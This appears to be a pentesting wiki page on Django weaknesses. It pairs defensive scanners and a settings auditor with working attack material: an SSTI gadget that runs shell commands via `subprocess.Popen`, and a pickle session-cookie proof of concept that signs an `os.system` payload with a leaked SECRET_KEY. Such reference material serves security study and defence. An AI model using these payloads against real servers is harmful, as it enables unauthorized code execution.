# Django

{{#include ../../banners/hacktricks-training.md}}

## Cache Manipulation to RCE

Django's default cache storage method is [Python pickles](https://docs.python.org/3/library/pickle.html), which can lead to RCE if [untrusted input is unpickled](https://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_Slides.pdf). **If an attacker can obtain write access to the cache, they can escalate this weakness to RCE on the underlying server**.

Django cache is stored in one of four places: [Redis](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/redis.py#L12), [memory](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/locmem.py#L16), [files](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/filebased.py#L16), or a [database](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/db.py#L95).

Cache stored in a Redis server or a database are the most likely attack vectors (Redis injection and SQL injection), but an attacker may also be able to use a file-based cache to turn an arbitrary write into RCE. The maintainers have marked this as a non-issue. Note that the cache file folder, the SQL table name, and the Redis server details will vary between deployments.

This HackerOne report provides a great, reproducible example of exploiting Django cache stored in a SQLite database: https://hackerone.com/reports/1415436

---

## Server-Side Template Injection (SSTI)

The Django Template Language (DTL) is **Turing-complete**. If user-supplied data is rendered as a *template string* (for example by calling `Template(user_input).render()` or when `|safe`/`format_html()` removes auto-escaping), an attacker may achieve full SSTI → RCE.

### Detection
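The first detection step in this section (finding calls that compile request data into a template) can be automated with a small static scan of the code base. The scanner below is an added example, not part of the original page or of Django: `find_template_sinks` and the constructed `SAMPLE_VIEWS` source are mine, and its taint tracking is deliberately flow-insensitive so that it over-reports rather than misses a sink.

```python
"""Static check for the first SSTI detection step: find calls that compile a string
into a template (Template(...), Engine.from_string(...), render_to_string(...)) whose
template-source argument is derived from the request.

Added example, not from the original page or from Django. find_template_sinks and the
SAMPLE_VIEWS source are constructed for illustration; the taint tracking is
deliberately flow-insensitive so it over-reports rather than misses."""
import ast

TEMPLATE_SINKS = {"Template", "from_string", "render_to_string"}
# Keyword names under which the sinks above accept their template source.
SOURCE_KWARGS = {"template_string", "template_code", "template_name"}


def _reads_request(node: ast.AST, tainted: set) -> bool:
    """True if the expression references request data or a name derived from it."""
    for sub in ast.walk(node):
        if isinstance(sub, ast.Name) and (sub.id == "request" or sub.id in tainted):
            return True
        if isinstance(sub, ast.Attribute) and sub.attr == "request":  # self.request
            return True
    return False


def _tainted_names(tree: ast.AST) -> set:
    """Names assigned, directly or transitively, from request data (fixpoint over assignments)."""
    tainted = set()
    changed = True
    while changed:
        changed = False
        for node in ast.walk(tree):
            if isinstance(node, ast.Assign) and _reads_request(node.value, tainted):
                for target in node.targets:
                    if isinstance(target, ast.Name) and target.id not in tainted:
                        tainted.add(target.id)
                        changed = True
    return tainted


def _call_name(call: ast.Call) -> str:
    if isinstance(call.func, ast.Name):
        return call.func.id
    if isinstance(call.func, ast.Attribute):
        return call.func.attr
    return ""


def _template_source_arg(call: ast.Call):
    """The argument that becomes template source: first positional or a known keyword."""
    if call.args:
        return call.args[0]
    for kw in call.keywords:
        if kw.arg in SOURCE_KWARGS:
            return kw.value
    return None


def find_template_sinks(source: str, filename: str = "<string>") -> list:
    """Return {'file', 'line', 'sink'} dicts, ordered by line, for each risky call."""
    tree = ast.parse(source, filename=filename)
    tainted = _tainted_names(tree)
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call) or _call_name(node) not in TEMPLATE_SINKS:
            continue
        src = _template_source_arg(node)
        if src is not None and _reads_request(src, tainted):
            findings.append({"file": filename, "line": node.lineno, "sink": _call_name(node)})
    return sorted(findings, key=lambda f: f["line"])


# Constructed sample views file (not real project code) with two risky calls and one safe one.
SAMPLE_VIEWS = '''\
from django.template import Template, Context, engines
from django.template.loader import render_to_string

def preview(request):
    body = request.POST.get("body", "")
    return Template(body).render(Context({}))  # risky: user string compiled as template

def preview2(request):
    tpl = engines["django"].from_string(request.GET["t"])  # risky
    return tpl.render({})

def safe(request):
    # fixed template name; user data only reaches the context
    return render_to_string("preview.html", {"body": request.POST.get("body", "")})
'''

if __name__ == "__main__":
    for f in find_template_sinks(SAMPLE_VIEWS, "views.py"):
        print(f"{f['file']}:{f['line']}: {f['sink']}() compiles request-derived data")
```

Only the template-source argument is inspected, so the safe pattern (a fixed template name with user data passed in the context) is not reported; a match means the string the user controls is being compiled, which is the precondition for the payload checks that follow.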
1. Look for dynamic calls to `Template()` / `Engine.from_string()` / `render_to_string()` that include *any* unsanitised request data.
2. Send a time-based or arithmetic payload:

```django
{{7*7}}
```

If the rendered output contains `49`, the input is compiled by the template engine.

### Primitive to RCE

Django blocks direct access to `__import__`, but the Python object graph is reachable:

```django
{{''.__class__.mro()[1].__subclasses__()}}
```

Find the index of `subprocess.Popen` (≈400–500, depending on the Python build) and execute arbitrary commands:

```django
{{''.__class__.mro()[1].__subclasses__()[438]('id',shell=True,stdout=-1).communicate()[0]}}
```

A safer universal gadget is to iterate until `cls.__name__ == 'Popen'`.

The same gadget works for **Debug Toolbar** or **Django-CMS** template rendering features that mishandle user input.

---

### See also: ReportLab/xhtml2pdf PDF export RCE

Applications built on Django commonly integrate xhtml2pdf/ReportLab to export views as PDF. When user-controlled HTML flows into PDF generation, `rl_safe_eval` may evaluate expressions inside triple brackets `[[[ ... ]]]`, enabling code execution (CVE-2023-33733). Details, payloads, and mitigations:

{{#ref}}
../../generic-methodologies-and-resources/python/bypass-python-sandboxes/reportlab-xhtml2pdf-triple-brackets-expression-evaluation-rce-cve-2023-33733.md
{{#endref}}

---

## Pickle-Backed Session Cookie RCE

If the setting `SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'` is enabled (or a custom serializer that deserialises pickle), Django *decrypts and unpickles* the session cookie **before** calling any view code. Therefore, possessing a valid signing key (the project `SECRET_KEY` by default) is enough for immediate remote code execution.

### Exploit Requirements

* The server uses `PickleSerializer`.
* The attacker knows / can guess `settings.SECRET_KEY` (leaks via GitHub, `.env`, error pages, etc.).
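Both preconditions are visible in the project settings, and the same pass can flag the pickled cache backends from the first section. The audit helper below is an added example, not part of the original page or of Django: it inspects a plain dict shaped like `django.conf.settings` (so it runs without Django installed; feed it `vars(settings)` on a real project), and the 50-character minimum key length and the placeholder markers are assumptions chosen for this example.

```python
"""Settings audit for the pickle exposures discussed on this page.

Added example, not Django's own code. It inspects a plain dict shaped like
django.conf.settings, so it runs without Django installed. The 50-character
minimum and the placeholder markers are assumptions chosen for this example."""
import os
import stat

PICKLE_SESSION = "django.contrib.sessions.serializers.PickleSerializer"
FILE_CACHE = "django.core.cache.backends.filebased.FileBasedCache"
# Django's built-in cache backends store values as pickles, so write access to the
# store is code execution (see the cache section above).
PICKLING_CACHE_BACKENDS = {
    "django.core.cache.backends.redis.RedisCache",
    "django.core.cache.backends.db.DatabaseCache",
    "django.core.cache.backends.locmem.LocMemCache",
    FILE_CACHE,
}
PLACEHOLDER_KEY_MARKERS = ("django-insecure-", "changeme", "secret_key_here")
MIN_KEY_LENGTH = 50


def dir_is_shared_writable(mode: int) -> bool:
    """True if the group or world write bit is set on a directory mode."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def check_cache_dir(alias: str, location: str) -> list:
    """Flag a file-based cache directory that other local users can write to."""
    try:
        mode = os.stat(location).st_mode
    except (FileNotFoundError, TypeError):
        return []  # Django creates the directory lazily; nothing to inspect yet
    if dir_is_shared_writable(mode):
        return [("HIGH", f"CACHES[{alias!r}] LOCATION {location} is group/world writable: "
                         "any local user can plant pickled entries")]
    return []


def audit_settings(settings: dict) -> list:
    """Return (severity, message) tuples; HIGH items match the exploit requirements above."""
    findings = []
    if settings.get("SESSION_SERIALIZER") == PICKLE_SESSION:
        findings.append(("HIGH", "SESSION_SERIALIZER is PickleSerializer: anyone holding SECRET_KEY "
                                 "can forge a session cookie that runs code on unpickle; use JSONSerializer"))
    key = str(settings.get("SECRET_KEY", ""))
    if len(key) < MIN_KEY_LENGTH or any(m in key.lower() for m in PLACEHOLDER_KEY_MARKERS):
        findings.append(("HIGH", "SECRET_KEY is short or looks like a template placeholder: "
                                 "generate a fresh key and keep it out of the repository"))
    if settings.get("DEBUG"):
        findings.append(("MEDIUM", "DEBUG=True: verbose error pages expose tracebacks and settings"))
    for alias, cfg in settings.get("CACHES", {}).items():
        backend = cfg.get("BACKEND", "")
        if backend in PICKLING_CACHE_BACKENDS:
            findings.append(("INFO", f"CACHES[{alias!r}] uses {backend.rsplit('.', 1)[-1]}: values are "
                                     "pickled, so protect the store (auth, network ACLs, permissions)"))
        if backend == FILE_CACHE:
            findings.extend(check_cache_dir(alias, cfg.get("LOCATION", "")))
    return findings


# Constructed sample settings, not taken from any real project.
RISKY_SETTINGS = {
    "DEBUG": False,
    "SECRET_KEY": "django-insecure-" + "x" * 40,
    "SESSION_SERIALIZER": PICKLE_SESSION,
    "CACHES": {"default": {"BACKEND": "django.core.cache.backends.redis.RedisCache",
                           "LOCATION": "redis://127.0.0.1:6379"}},
}

if __name__ == "__main__":
    for severity, message in audit_settings(RISKY_SETTINGS):
        print(f"[{severity}] {message}")
```

A custom serializer that wraps pickle will not match the string comparison; review any non-default `SESSION_SERIALIZER` value by hand.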
### Proof-of-Concept

```python
#!/usr/bin/env python3
from django.contrib.sessions.serializers import PickleSerializer
from django.core import signing
import os


class RCE(object):
    # pickle calls __reduce__ on load and invokes the returned callable with its arguments
    def __reduce__(self):
        return (os.system, ("id > /tmp/pwned",))


# Sign the pickled object with the leaked key, using the same serializer as the server
mal = signing.dumps(RCE(), key=b'SECRET_KEY_HERE', serializer=PickleSerializer)
print(f"sessionid={mal}")
```

Send the resulting cookie, and the payload runs with the privileges of the WSGI worker.

**Mitigations**: use the default `JSONSerializer`, rotate `SECRET_KEY` regularly, and set `SESSION_COOKIE_HTTPONLY`.

---

## High-Impact Django CVEs (2023-2025) Pentesters Should Check

* **CVE-2025-48432** – *Log Injection via unescaped `request.path`* (fixed June 4 2025). Allows attackers to smuggle newlines/ANSI codes into log files and poison downstream log analysis. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2.
* **CVE-2024-42005** – *Critical SQL injection* in `QuerySet.values()/values_list()` on `JSONField` (CVSS 9.8). Craft JSON keys to break out of quoting and execute arbitrary SQL. Fixed in 4.2.15 / 5.0.8.

Always fingerprint the exact framework version via the `X-Frame-Options` error page or the hash of `/static/admin/css/base.css`, and test the items above where applicable.

---

## References

* Django security release – "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" – 4 Jun 2025.
* OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" – 11 Aug 2024.
* 0xdf: University (HTB) – Exploiting xhtml2pdf/ReportLab CVE-2023-33733 to gain RCE and pivot into AD – [https://0xdf.gitlab.io/2025/08/09/htb-university.html](https://0xdf.gitlab.io/2025/08/09/htb-university.html)

{{#include ../../banners/hacktricks-training.md}}
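As a defensive counterpart to the CVE-2025-48432 entry above (the real fix is upgrading to the patched releases), here is an added example, not Django's code, of a `logging.Filter` that neutralises newlines and ANSI escape sequences in request-derived log arguments before a handler formats them, so a crafted path cannot forge extra log lines or inject terminal control codes. `RequestFieldSanitizer`, `render_request_log` and the crafted sample path are constructed for this example; the message format only mimics Django's `django.request` "Not Found" line.

```python
"""Log-injection hardening: strip ANSI escapes and escape control characters in
string log arguments. Added example, not Django's own fix; the sample path and the
logger set-up are constructed for illustration."""
import io
import logging
import re

# ANSI CSI (ESC [ ... final byte) and OSC (ESC ] ... BEL or ESC \) sequences.
ANSI_RE = re.compile(r"\x1b\[[0-?]*[ -/]*[@-~]|\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)")
# Any remaining C0/C1 control character, including CR/LF used to forge extra log lines.
CONTROL_RE = re.compile(r"[\x00-\x1f\x7f-\x9f]")


def sanitize_log_field(value: str) -> str:
    """Strip escape sequences and render leftover control characters as visible \\xNN."""
    value = ANSI_RE.sub("", value)
    return CONTROL_RE.sub(lambda m: f"\\x{ord(m.group()):02x}", value)


class RequestFieldSanitizer(logging.Filter):
    """Sanitise string message arguments (e.g. request.path) before handlers format them."""

    def filter(self, record: logging.LogRecord) -> bool:
        if isinstance(record.args, tuple):
            record.args = tuple(sanitize_log_field(a) if isinstance(a, str) else a
                                for a in record.args)
        elif isinstance(record.args, dict):
            record.args = {k: sanitize_log_field(v) if isinstance(v, str) else v
                           for k, v in record.args.items()}
        return True  # never drop the record, only clean it


def render_request_log(path: str, status: int) -> str:
    """Emit one 404 line in the style of Django's django.request logger and return the text."""
    logger = logging.getLogger("example.request")
    logger.handlers.clear()
    logger.propagate = False
    logger.setLevel(logging.INFO)
    buf = io.StringIO()
    handler = logging.StreamHandler(buf)
    handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
    handler.addFilter(RequestFieldSanitizer())
    logger.addHandler(handler)
    logger.warning("Not Found: %s (status %d)", path, status)
    handler.flush()
    return buf.getvalue()


# Constructed attacker-style path: a newline to forge a second log line plus ANSI colour codes.
CRAFTED_PATH = "/missing\n[ERROR] forged line \x1b[31mred\x1b[0m"

if __name__ == "__main__":
    print(render_request_log(CRAFTED_PATH, 404), end="")
```

Attaching the filter to the handler rather than the logger means every record that reaches that sink is cleaned regardless of which logger emitted it; the format string itself is left alone because it is developer-controlled.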